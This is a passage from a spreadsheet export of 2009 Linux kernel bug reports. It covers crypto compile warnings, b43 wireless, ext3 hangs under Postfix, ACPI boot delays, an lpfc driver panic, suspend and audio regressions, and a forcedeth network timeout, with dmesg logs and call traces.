    <t>2009-05-03 11:47 UTC</t>
  </si>
  <si>
    <t>Erick Couts</t>
  </si>
  <si>
    <t>2012-06-07 10:58 UTC</t>
  </si>
  <si>
    <t>Other/LSM</t>
  </si>
  <si>
    <t>CC crypto/aes_generic.o crypto/aes_generic.c: In function ‘crypto_aes_expand_key’: crypto/aes_generic.c:283: warning: array subscript is above array bounds crypto/aes_generic.c:283: warning: array subscript is above array bounds crypto/aes_generic.c:283: warning: array subscript is above array bounds crypto/aes_generic.c:283: warning: array subscript is above array bounds When attempting to compile the kernel in both 32 and 64-bit, aes fails to compile correctly with this error and tests fail on startup. I've tried this on both a 32-bit Pentium III and a 64-bit Core 2 Duo processor setup. Both fail miserably. The kernel continues to compile completely so there's no hard errors; but I feel the code needs to be repaired a bit.</t>
  </si>
  <si>
    <t>2.6.29.2</t>
  </si>
  <si>
    <t>B43: low upload speed</t>
  </si>
  <si>
    <t>2.6.XX</t>
  </si>
  <si>
    <t>2009-05-03 18:19 UTC</t>
  </si>
  <si>
    <t>2010-02-26 22:39 UTC</t>
  </si>
  <si>
    <t>download speed is ok, but upload is about 1Mbit/s changing txpower does not give any effect (maybe it is hardware problem, but i dont' have another OS to prove) lspci: 30:00.0 Network controller: Broadcom Corporation BCM4312 802.11a/b/g (rev 02) dmesg|grep b43: b43-pci-bridge 0000:30:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 b43-pci-bridge 0000:30:00.0: setting latency timer to 64 b43-phy0: Broadcom 4311 WLAN found wmaster0 (b43): not using net_device_ops yet wlan0 (b43): not using net_device_ops yet input: b43-phy0 as /devices/virtual/input/input9 b43 ssb0:0: firmware: requesting b43/ucode13.fw b43 ssb0:0: firmware: requesting b43/b0g0initvals13.fw b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) Registered led device: b43-phy0::tx Registered led device: b43-phy0::rx Registered led device: b43-phy0::radio b43-phy0: Radio turned on by software input: b43-phy0 as /devices/virtual/input/input10 iwconfig wlan0: wlan0 IEEE 802.11bg ESSID:"my-essid" Mode:Managed Frequency:2.437 GHz Access Point: &lt;AP:MAc&gt; Bit Rate=54 Mb/s Tx-Power=20 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Power Management:off Link Quality=94/100 Signal level:-55 dBm Noise level=-69 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 uname -r: 2.6.29-ARCH (2.6.29.2, archlinux)</t>
  </si>
  <si>
    <t>ext3/4 with synchronous writes gets wedged by Postfix</t>
  </si>
  <si>
    <t>2009-05-03 19:46 UTC</t>
  </si>
  <si>
    <t>2009-06-07 20:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.9 Earliest failing kernel version: 2.6.29 Distribution: Ubuntu 8.04 LTS Hardware Environment: Intel 875p chipset (ICH5), P4 with HT Software Environment: Postfix 2.5.1-2ubuntu1.2 Problem Description: With its queue directory on an ext3 or journalled ext4 file system, mounted with the 'sync' option (or with the 'S' attribute on the individual queue directories, which is a config option for the Ubuntu package), sending more than a few messages in quick succession through Postfix causes Postfix and any other process attempting to modify the file system afterwards (e.g. by updating the atime when listing a directory) to hang in uninterruptible sleep. sync(1) will also hang afterwards. If the FS is mounted noatime, it is still possible to read from it, although trying to list the affected queue directories still causes ls to hang (the list of affected directories seems to vary, but may include at least "active" and "maildrop"). This happens whether the filesystem is on a hard disk or a RAM disk (/dev/ramX, not tmpfs). Enabling or disabling barriers, or changing the journalling mode doesn't help. Ext2 seems to be unaffected, as does non-journalled ext4. XFS, Reiser and JFS are also fine. The hang doesn't occur if the queue directories have the 'D' attribute (and a non-sync mount) instead of 'S'. Nothing appears in dmesg at the time of the hang, but here's the output from SysRq-W afterwards (ext3 FS, kernel 2.6.29.2, non-SMP, PREEMPT_NONE): SysRq : Show Blocked State task PC stack pid father kjournald D c01384df 0 2525 2 cfcb5f0c 00000082 de27d500 c01384df cfcb5ef4 c02cb5c0 00000001 de32ca00 de324814 dd037ebc de324814 de324934 dd037ebc cfcb5f5c cfcb5f90 c01bd4bb 00000046 c0424110 de324a0c de324814 de324800 00000000 00000002 dd037e80 Call Trace: [&lt;c01384df&gt;] ? trace_hardirqs_on+0xb/0xd [&lt;c01bd4bb&gt;] journal_commit_transaction+0xea/0xeaf [&lt;c02c534a&gt;] ? _spin_unlock_irqrestore+0x38/0x3f [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c0122a25&gt;] ? del_timer+0x50/0x59 [&lt;c01c0c75&gt;] kjournald+0xad/0x1bb [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c01c0bc8&gt;] ? kjournald+0x0/0x1bb [&lt;c012b442&gt;] kthread+0x37/0x59 [&lt;c012b40b&gt;] ? kthread+0x0/0x59 [&lt;c0103667&gt;] kernel_thread_helper+0x7/0x10 pickup D c01384df 0 2597 2594 cfaa9e5c 00000086 df9faa80 c01384df cfaa9e44 00000282 cfaa9e74 de32ca00 cfaa9e5c c012b8b7 00000002 de324800 0000014f cfaa9e74 cfaa9e94 c01c0539 00000000 de3248c8 de324910 de324814 00000000 df9faa80 c012b6ee de3248e4 Call Trace: [&lt;c01384df&gt;] ? trace_hardirqs_on+0xb/0xd [&lt;c012b8b7&gt;] ? prepare_to_wait+0x42/0x4a [&lt;c01c0539&gt;] log_wait_commit+0x90/0xf7 [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c01bba9d&gt;] journal_stop+0x1c8/0x288 [&lt;c01b4236&gt;] __ext3_journal_stop+0x1c/0x38 [&lt;c01aeb96&gt;] ext3_delete_inode+0x90/0xc2 [&lt;c01aeb06&gt;] ? ext3_delete_inode+0x0/0xc2 [&lt;c017ab82&gt;] generic_delete_inode+0x72/0x100 [&lt;c02c4ee1&gt;] ? _spin_lock+0x3a/0x40 [&lt;c017ad4c&gt;] generic_drop_inode+0x13c/0x1da [&lt;c01d4068&gt;] ? _atomic_dec_and_lock+0x10/0x38 [&lt;c017a4e7&gt;] iput+0x47/0x4e [&lt;c0173db0&gt;] do_unlinkat+0xc1/0x137 [&lt;c0102f87&gt;] ? sysenter_exit+0xf/0x18 [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c0173e36&gt;] sys_unlink+0x10/0x12 [&lt;c0102f55&gt;] sysenter_do_call+0x12/0x35 qmgr D c01384df 0 2598 2594 cfe23e60 00000082 df9fa200 c01384df cfe23e48 c02cb5c0 cfe23e78 de32cf00 cfe23e60 c012b8b7 00000002 de324800 0000014f cfe23e78 cfe23e98 c01c0539 00000000 de3248c8 de324910 de324814 00000000 df9fa200 c012b6ee cfaa9e80 Call Trace: [&lt;c01384df&gt;] ? trace_hardirqs_on+0xb/0xd [&lt;c012b8b7&gt;] ? prepare_to_wait+0x42/0x4a [&lt;c01c0539&gt;] log_wait_commit+0x90/0xf7 [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c01bba9d&gt;] journal_stop+0x1c8/0x288 [&lt;c01ac11e&gt;] ? ext3_mark_iloc_dirty+0x1d8/0x34b [&lt;c01b4236&gt;] __ext3_journal_stop+0x1c/0x38 [&lt;c01b309d&gt;] ext3_unlink+0x70/0x157 [&lt;c0172344&gt;] ? vfs_unlink+0x45/0xb0 [&lt;c0172358&gt;] vfs_unlink+0x59/0xb0 [&lt;c0173e17&gt;] do_unlinkat+0x128/0x137 [&lt;c0102f87&gt;] ? sysenter_exit+0xf/0x18 [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c0173e36&gt;] sys_unlink+0x10/0x12 [&lt;c0102f55&gt;] sysenter_do_call+0x12/0x35 local D c01384df 0 2654 2594 de369c74 00000096 df9f8880 c01384df de369c5c 00000286 00000000 de183b80 de324814 de324800 de324814 dd037e80 de324800 de324880 de369cc4 c01bc306 c0138489 00000246 00000046 00000001 de324a0c de324814 de324814 df59c060 Call Trace: [&lt;c01384df&gt;] ? trace_hardirqs_on+0xb/0xd [&lt;c01bc306&gt;] start_this_handle+0x1c2/0x361 [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c01bc54a&gt;] journal_start+0xa5/0x100 [&lt;c01b43ac&gt;] ext3_journal_start_sb+0x48/0x4d [&lt;c01aec4c&gt;] ext3_write_begin+0x84/0x1c6 [&lt;c0139fe2&gt;] ? __lock_acquire+0x32b/0xa21 [&lt;c014749e&gt;] generic_file_buffered_write+0xe1/0x292 [&lt;c0147a94&gt;] __generic_file_aio_write_nolock+0x25c/0x4ab [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c0147f63&gt;] generic_file_aio_write+0x66/0xda [&lt;c0138f6b&gt;] ? validate_chain+0x3f5/0x1141 [&lt;c01aad03&gt;] ext3_file_write+0x27/0xa8 [&lt;c016a972&gt;] do_sync_write+0xcc/0x102 [&lt;c012b6ee&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;c016b16d&gt;] vfs_write+0x8b/0x11f [&lt;c0102f87&gt;] ? sysenter_exit+0xf/0x18 [&lt;c016a8a6&gt;] ? do_sync_write+0x0/0x102 [&lt;c016b577&gt;] sys_write+0x3d/0x64 [&lt;c0102f55&gt;] sysenter_do_call+0x12/0x35 postdrop D c01384df 0 2664 2663 cfcbfd6c 00000086 dd13f700 c01384df cfcbfd54 c02cb5c0 00000001 deedc780 c03a1690 c1402348 c03a1690 cfcbfd7c c1402348 cfcbfd90 cfcbfd9c c017a55b dd758c48 00000007 00000000 dd13f700 c012b726 c1402364 c1402364 00152b13 Call Trace: [&lt;c01384df&gt;] ? trace_hardirqs_on+0xb/0xd [&lt;c017a55b&gt;] __wait_on_freeing_inode+0x6d/0x88 [&lt;c012b726&gt;] ? wake_bit_function+0x0/0x47 [&lt;c017a5b5&gt;] find_inode_fast+0x3f/0x4a [&lt;c017ba05&gt;] insert_inode_locked+0x50/0xeb [&lt;c01ab90b&gt;] ext3_new_inode+0x738/0x88f [&lt;c01bc550&gt;] ? journal_start+0xab/0x100 [&lt;c01b259a&gt;] ext3_create+0x59/0xbf [&lt;c01722c4&gt;] vfs_create+0x75/0xb0 [&lt;c02c4dda&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c01b2541&gt;] ? ext3_create+0x0/0xbf [&lt;c0174bc3&gt;] do_filp_open+0x644/0x713 [&lt;c02c4dda&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c01692ce&gt;] do_sys_open+0x45/0xce [&lt;c0102f87&gt;] ? sysenter_exit+0xf/0x18 [&lt;c0138489&gt;] ? trace_hardirqs_on_caller+0x145/0x190 [&lt;c01693a3&gt;] sys_open+0x23/0x2b [&lt;c0102f55&gt;] sysenter_do_call+0x12/0x35 Sched Debug Version: v0.08, 2.6.29.2-test #1 now at 166155.025991 msecs .sysctl_sched_latency : 20.000000 .sysctl_sched_min_granularity : 4.000000 .sysctl_sched_wakeup_granularity : 5.000000 .sysctl_sched_child_runs_first : 0.000001 .sysctl_sched_features : 24191 cpu#0, 2798.181 MHz .nr_running : 2 .load : 2048 .nr_switches : 284843 .nr_load_updates : 6497 .nr_uninterruptible : 5 .jiffies : 4294953911 .next_balance : 0.000000 .curr-&gt;pid : 2466 .clock : 166154.370058 .cpu_load[0] : 0 .cpu_load[1] : 4 .cpu_load[2] : 76 .cpu_load[3] : 160 .cpu_load[4] : 196 cfs_rq[0]: .exec_clock : 0.000000 .MIN_vruntime : 24407.116340 .min_vruntime : 24407.114218 .max_vruntime : 24407.116340 .spread : 0.000000 .spread0 : 0.000000 .nr_running : 2 .load : 2048 .nr_spread_over : 0 rt_rq[0]: .rt_nr_running : 0 .rt_throttled : 0 .rt_time : 0.000000 .rt_runtime : 950.000000 runnable tasks: task PID tree-key switches prio exec-runtime sum-exec sum-sleep ---------------------------------------------------------------------------------------------------------- Xorg 2163 24407.116340 28791 120 0 0 0.000000 0.000000 0.000000 R bash 2466 24387.418829 274 120 0 0 0.000000 0.000000 0.000000 Steps to reproduce: # mount -o remount,sync /var (or wherever queue_directory points to in the Postfix config) # while true; do sendmail testaddr@localhost &lt;/dev/null; done</t>
  </si>
  <si>
    <t>2.6.27 regression - boot delays on battery, but not on A/C - Compaq Presario F756NR</t>
  </si>
  <si>
    <t>2.6.27.(all), 2.6.28.(all),  2.6.29.(all), 2.6.30rc4</t>
  </si>
  <si>
    <t>2009-05-03 20:08 UTC</t>
  </si>
  <si>
    <t>Dmitry Lyzhyn</t>
  </si>
  <si>
    <t>2009-06-01 19:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 21200 [details] dmesg Hello, So far I found this issue affects Compaq Presario F756NR laptop. Whenever powering without connected power adapter, using the battery only the kernel recognizes hardware devices with long delays between kind of "steps". Looks like it stucks recognizing devices. If you wait about 3-4 minutes then kernel continuing until it stucked on next "step". And this happens over and over again approximately 10-15 times during the system boots up. If you don't wait and hit any key then booting continues immediately but until next stop. So on, you hit any key after each stop and system keeps loading. However if I plug power supply during the one of these delays then system continuing load with no more delays or any stuck. If power supply is plugged all time then system boots up normally without any delays. This issue never occurs with using kernels 2.6.26 and below. The only way to avoid this issue on new kernels is to use boot options nolapic or idle=poll. But as you know nolapic won't let to use SMP and idle=poll heats CPU. Here is the ACPI kernel configuration: # Power management options # CONFIG_PM=y # CONFIG_PM_DEBUG is not set CONFIG_PM_SLEEP_SMP=y CONFIG_PM_SLEEP=y CONFIG_SUSPEND=y CONFIG_SUSPEND_FREEZER=y CONFIG_HIBERNATION=y CONFIG_PM_STD_PARTITION="/dev/sda3" CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_PROCFS=y CONFIG_ACPI_PROCFS_POWER=y CONFIG_ACPI_SYSFS_POWER=y CONFIG_ACPI_PROC_EVENT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=m CONFIG_ACPI_FAN=y CONFIG_ACPI_DOCK=y # CONFIG_ACPI_BAY is not set CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_HOTPLUG_CPU=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_WMI=m # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_CUSTOM_DSDT is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y CONFIG_ACPI_CONTAINER=y CONFIG_ACPI_SBS=y # CONFIG_APM is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=y CONFIG_CPU_FREQ_STAT_DETAILS=y # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set # CONFIG_CPU_FREQ_DEFAULT_GOV_POWERSAVE is not set # CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND=y # CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE is not set CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_POWERSAVE=m CONFIG_CPU_FREQ_GOV_USERSPACE=m CONFIG_CPU_FREQ_GOV_ONDEMAND=y CONFIG_CPU_FREQ_GOV_CONSERVATIVE=m # # CPUFreq processor drivers # CONFIG_X86_ACPI_CPUFREQ=y # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set CONFIG_X86_POWERNOW_K8=y CONFIG_X86_POWERNOW_K8_ACPI=y # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_SMI is not set # CONFIG_X86_P4_CLOCKMOD is not set CONFIG_X86_CPUFREQ_NFORCE2=m # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # CONFIG_X86_E_POWERSAVER is not set Thnx in advance!</t>
  </si>
  <si>
    <t>System Panics with emulex lpfc driver during the boot</t>
  </si>
  <si>
    <t>2009-05-04 14:25 UTC</t>
  </si>
  <si>
    <t>Babu Moger</t>
  </si>
  <si>
    <t>2012-06-07 10:25 UTC</t>
  </si>
  <si>
    <t>I have two luns connected to my system with lpfc adapter. During the boot up I am seeing following panic. ========================================================= Starting udev: [ OK ] Loading default keymap (us): [ OK ] Setting hostname mymachine: [ OK ] BUG: unable to handle kernel NULL pointer dereference at 0000000000000011 IP: [&lt;ffffffffa0137367&gt;] lpfc_mbox_timeout_handler+0x34/0x176 [lpfc] PGD 0 Oops: 0000 [#1] SMP last sysfs file: /sys/block/sdh/dev CPU 2 Modules linked in: dm_round_robin scsi_dh_rdac dm_multipath scsi_dh sbs sbshc battery acpi_memhotplug ac parport_pc lp parport joydev sg dcdbas ide_cd_mod cdrom bnx2 serio_raw button rtc_cmos rtc_core rtc_lib i5000_edac edac_core pcspkr dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod lpfc qla2xxx scsi_transport_fc ata_piix libata shpchp megaraid_sas sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd Pid: 687, comm: lpfc_worker_0 Not tainted 2.6.30-rc4 #1 PowerEdge 2900 RIP: 0010:[&lt;ffffffffa0137367&gt;] [&lt;ffffffffa0137367&gt;] lpfc_mbox_timeout_handler+0x34/0x176 [lpfc] RSP: 0018:ffff88007db83d80 EFLAGS: 00010282 RAX: ffff88007d830c38 RBX: 0000000000000000 RCX: ffff88007db83d30 RDX: ffff88007db83da0 RSI: ffff88007d9242c8 RDI: ffff88007f381000 RBP: ffff88007d924000 R08: ffff88007db83d30 R09: ffff88007db83d30 R10: ffff88007d924298 R11: ffffffff8027bd2c R12: ffff88007d924a90 R13: ffff88007d830c38 R14: ffffffff807f1fe0 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff880001063000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000011 CR3: 0000000000201000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process lpfc_worker_0 (pid: 687, threadinfo ffff88007db82000, task ffff88007f13e380) Stack: ffff88007d924000 0000000000000000 000004007d830c38 ffff88007dd10000 ffff88007d830c38 ffff88007d924a90 ffff88007d830c38 ffffffff807f1fe0 0000000000000000 ffffffffa01471aa 0000000000000000 0000000000000000 Call Trace: [&lt;ffffffffa01471aa&gt;] ? lpfc_do_work+0x80d/0x126a [lpfc] [&lt;ffffffff8022d3e6&gt;] ? update_curr+0x6f/0xaa [&lt;ffffffff804b6c76&gt;] ? thread_return+0x3e/0x92 [&lt;ffffffff8024a4b6&gt;] ? autoremove_wake_function+0x0/0x2e [&lt;ffffffffa014699d&gt;] ? lpfc_do_work+0x0/0x126a [lpfc] [&lt;ffffffffa014699d&gt;] ? lpfc_do_work+0x0/0x126a [lpfc] [&lt;ffffffff8024a385&gt;] ? kthread+0x54/0x83 [&lt;ffffffff8020c93a&gt;] ? child_rip+0xa/0x20 [&lt;ffffffff8024a331&gt;] ? kthread+0x0/0x83 [&lt;ffffffff8020c930&gt;] ? child_rip+0x0/0x20 Code: 48 89 fd 53 48 83 ec 18 8b 47 04 48 8b 9f 78 05 00 00 89 44 24 14 44 8b bf 48 0c 00 00 48 8b 87 d8 10 00 00 48 8b bf 88 0a 00 00 &lt;44&gt; 0f b6 73 11 4c 8b a7 90 00 00 00 48 83 ef 80 44 8b 68 1c e8 RIP [&lt;ffffffffa0137367&gt;] lpfc_mbox_timeout_handler+0x34/0x176 [lpfc] RSP &lt;ffff88007db83d80&gt; CR2: 0000000000000011 ---[ end trace c69908409be07954 ]---</t>
  </si>
  <si>
    <t>suspend fails, bisected 2.6.30 regression, pnp_bus_suspend() returns -5 -- HP Compaq nc6000</t>
  </si>
  <si>
    <t>2009-05-04 15:02 UTC</t>
  </si>
  <si>
    <t>cedric</t>
  </si>
  <si>
    <t>2009-05-18 17:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 21212 [details] .config file when trying to suspend on my laptop with 2.6.30-rc4, i have the following dmesg : ... pnp 00:07: legacy suspend pnp 00:06: legacy suspend pnp 00:05: legacy suspend pnp 00:04: legacy suspend pnp 00:03: legacy suspend serial 00:02: legacy suspend ACPI: Transitioning device [C169] to D3 serial 00:02: disable failed suspend_device(): pnp_bus_suspend+0x0/0x6b returns -5 PM: Device 00:02 failed to suspend: error -5 PM: Some devices failed to suspend pnp 00:03: legacy resume pnp 00:04: legacy resume pnp 00:05: legacy resume pnp 00:06: legacy resume pnp 00:07: legacy resume pnp 00:08: legacy resume ...</t>
  </si>
  <si>
    <t>possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2.6.30-rc4-git1</t>
  </si>
  <si>
    <t>2009-05-04 16:56 UTC</t>
  </si>
  <si>
    <t>2009-05-30 21:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 21214 [details] INFO message text As far as I can tell, the system is running normally after resume. Also, I only see this INFO message on the first suspend/resume cycle. Subsequent suspends do not trigger the message.</t>
  </si>
  <si>
    <t>Side channel of Intel HDA chip doesn't work anymore, did work with 2.6.29</t>
  </si>
  <si>
    <t>2009-05-05 10:14 UTC</t>
  </si>
  <si>
    <t>2009-05-30 21:35 UTC</t>
  </si>
  <si>
    <t>The ALSA mixer is now missing the side channel, which was present and did work with the previous kernel. I also have a ATI graphics card with HDA chip which I don't use for audio in that machine. lspci: 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 02) Subsystem: Intel Corporation Device 2504 Flags: bus master, fast devsel, latency 0, IRQ 22 Memory at d0220000 (64-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel</t>
  </si>
  <si>
    <t>x86_64 kernel misinterprets "reserve=" boot parameter</t>
  </si>
  <si>
    <t>2009-05-06 01:43 UTC</t>
  </si>
  <si>
    <t>pablomme</t>
  </si>
  <si>
    <t>2009-08-29 18:58 UTC</t>
  </si>
  <si>
    <t>I've reported this on Ubuntu Launchpad as bug 370003, but it seemed wise to report it here as well. My laptop suffers from bug #9905 (#187671 in launchpad), which is in fact a BIOS defect: the ACPI tables suggest an arrangement where MMIO regions for different devices overlap and cause the machine to freeze on loading the sdhci[-pci] module, as well as the vanilla 8139too module (the latter was modified a while back in Ubuntu to use PIO instead, to partially address this problem). Recently another user reported successfully bypassing the problem by adding "reserve=0xffb00000,0x100000" to the kernel command line. I can confirm this works on the x86 kernel, but not on the x86_64 kernel, which I'm currently running. When adding the option to the x86_64 kernel, /proc/iomem shows this as the last line: ffffffffffb00000-ffffffffffbfffff : reserved which should have been, clearly, one of: ffb00000-ffbfffff : reserved 00000000ffb00000-00000000ffbfffff : reserved but for some reason the kernel prepends a bunch of ones instead of zeros to the 32-bit address to produce a 64-bit address. Specifying "reserve=0x00000000ffb00000,0x100000" on the command line does not help, though. Let me know if I've misclassified the bug, my guess is ACPI, but I may be very wrong here...</t>
  </si>
  <si>
    <t>After few hours (less than 3) Network module crash and I need to reboot</t>
  </si>
  <si>
    <t>2.6.29.2-52.fc10</t>
  </si>
  <si>
    <t>2009-05-06 19:05 UTC</t>
  </si>
  <si>
    <t>Michel Nolly</t>
  </si>
  <si>
    <t>2009-07-20 14:35 UTC</t>
  </si>
  <si>
    <t>Since few kernel release from fedora 10 repo, kernel crash when network is sollicited : long download, or reading a movie from samba server. I tried noapic option : no change noapic and nolapic options : nochange I tried with an addon network pci card accton en1207 and just noapic : ok (it failed without noapic) cpu model name : AMD Athlon(tm) 64 Processor 3000+ ram is 2x512 MB network is onboard nforce3 network (forcedeth driver) Here is the kernel tracelog (napic and nolapic options used) May 6 18:13:25 mybecane kernel: WARNING: at net/sched/sch_generic.c:226 dev_watchdog+0xac/0x140() (Not tainted) May 6 18:13:25 mybecane kernel: Hardware name: SN85V30 May 6 18:13:25 mybecane kernel: NETDEV WATCHDOG: eth0 (forcedeth): transmit timed out May 6 18:13:25 mybecane kernel: Modules linked in: fuse sunrpc ipv6 nf_conntrack_netbios_ns cpufreq_ondemand powernow_k8 dm_multipath uinput snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device ppdev snd_pcm_oss snd_mixer_oss pcspkr floppy snd_pcm firewire_ohci firewire_core k8temp hwmon snd_timer snd forcedeth i2c_nforce2 crc_itu_t soundcore parport_pc i2c_core snd_page_alloc parport pata_amd ata_generic pata_acpi sata_nv [last unloaded: scsi_wait_scan] May 6 18:13:25 mybecane kernel: Pid: 0, comm: swapper Not tainted 2.6.29.2-52.fc10.i686 #1 May 6 18:13:25 mybecane kernel: Call Trace: May 6 18:13:25 mybecane kernel: [&lt;c042e5c4&gt;] warn_slowpath+0x77/0xb4 May 6 18:13:25 mybecane kernel: [&lt;c0424f59&gt;] ? enqueue_entity+0x295/0x29d May 6 18:13:25 mybecane kernel: [&lt;c04220f8&gt;] ? check_preempt_wakeup+0x167/0x1ad May 6 18:13:25 mybecane kernel: [&lt;c06d7946&gt;] ? _spin_unlock_irqrestore+0x22/0x38 May 6 18:13:25 mybecane kernel: [&lt;c04287a4&gt;] ? try_to_wake_up+0x22e/0x239 May 6 18:13:25 mybecane kernel: [&lt;c04287ba&gt;] ? default_wake_function+0xb/0xd May 6 18:13:25 mybecane kernel: [&lt;c043f146&gt;] ? autoremove_wake_function+0xf/0x33 May 6 18:13:25 mybecane kernel: [&lt;c05308b2&gt;] ? strlcpy+0x17/0x49 May 6 18:13:25 mybecane kernel: [&lt;c0662eb0&gt;] dev_watchdog+0xac/0x140 May 6 18:13:25 mybecane kernel: [&lt;c0410068&gt;] ? speedstep_detect_processor+0xf9/0x1fd May 6 18:13:25 mybecane kernel: [&lt;f7d3c955&gt;] ? nv_napi_poll+0x4ce/0x4d9 [forcedeth] May 6 18:13:25 mybecane kernel: [&lt;c04364b8&gt;] run_timer_softirq+0x14b/0x1bb May 6 18:13:25 mybecane kernel: [&lt;c0662e04&gt;] ? dev_watchdog+0x0/0x140 May 6 18:13:25 mybecane kernel: [&lt;c0662e04&gt;] ? dev_watchdog+0x0/0x140 May 6 18:13:25 mybecane kernel: [&lt;c04332b2&gt;] __do_softirq+0x98/0x136 May 6 18:13:25 mybecane kernel: [&lt;c043321a&gt;] ? __do_softirq+0x0/0x136 May 6 18:13:25 mybecane kernel: &lt;IRQ&gt; [&lt;c0432f7e&gt;] ? irq_exit+0x44/0x72 May 6 18:13:25 mybecane kernel: [&lt;c041486d&gt;] ? smp_apic_timer_interrupt+0x74/0x82 May 6 18:13:25 mybecane kernel: [&lt;c04044e1&gt;] ? apic_timer_interrupt+0x2d/0x34 May 6 18:13:25 mybecane kernel: [&lt;c041ab47&gt;] ? native_safe_halt+0x5/0x7 May 6 18:13:25 mybecane kernel: [&lt;c04091d6&gt;] ? default_idle+0x4a/0x84 May 6 18:13:25 mybecane kernel: [&lt;c0402dfc&gt;] ? cpu_idle+0x6b/0x8b May 6 18:13:25 mybecane kernel: [&lt;c06c67fb&gt;] ? rest_init+0x53/0x55 May 6 18:13:25 mybecane kernel: ---[ end trace 07f9a974f431ff39 ]--- May 6 18:13:25 mybecane kernel: eth0: Got tx_timeout. irq: 00000000 May 6 18:13:25 mybecane kernel: eth0: Ring at 36489000 May 6 18:13:25 mybecane kernel: eth0: Dumping tx registers May 6 18:13:25 mybecane kernel: 0: 00000000 000000ff 00000003 025703ca 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 20: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 40: 0420e20e 00000855 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 60: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 80: 003b0f3c 00000001 00040000 007f0028 0000061c 00000001 00200000 80007f53 May 6 18:13:25 mybecane kernel: a0: 0015050f 00000016 b71b3000 00000801 00000001 00000000 4800cccd 000004fc May 6 18:13:25 mybecane kernel: c0: 00000001 00000001 00000001 00000001 00000001 00000001 00000001 00000001 May 6 18:13:25 mybecane kernel: e0: 00000001 00000001 00000001 00000001 00000001 00000001 00000001 00000001 May 6 18:13:25 mybecane kernel: 100: 36489400 36489000 007f00ff 00008000 00010064 00000000 00000043 364896f0 May 6 18:13:25 mybecane kernel: 120: 364890e0 21707400 a000ffe1 00000000 00000000 364896ec 364890e4 01e08000 May 6 18:13:25 mybecane kernel: 140: 003041c0 00002500 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 160: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 180: 00000016 00000008 0194786d 00008103 00000025 000045e1 0194786d 0000c5e3 May 6 18:13:25 mybecane kernel: 1a0: 00000016 00000008 0194786d 00008103 00000025 000045e1 0194786d 0000c5e3 May 6 18:13:25 mybecane kernel: 1c0: 00000016 00000008 0194786d 00008103 00000025 000045e1 0194786d 0000c5e3 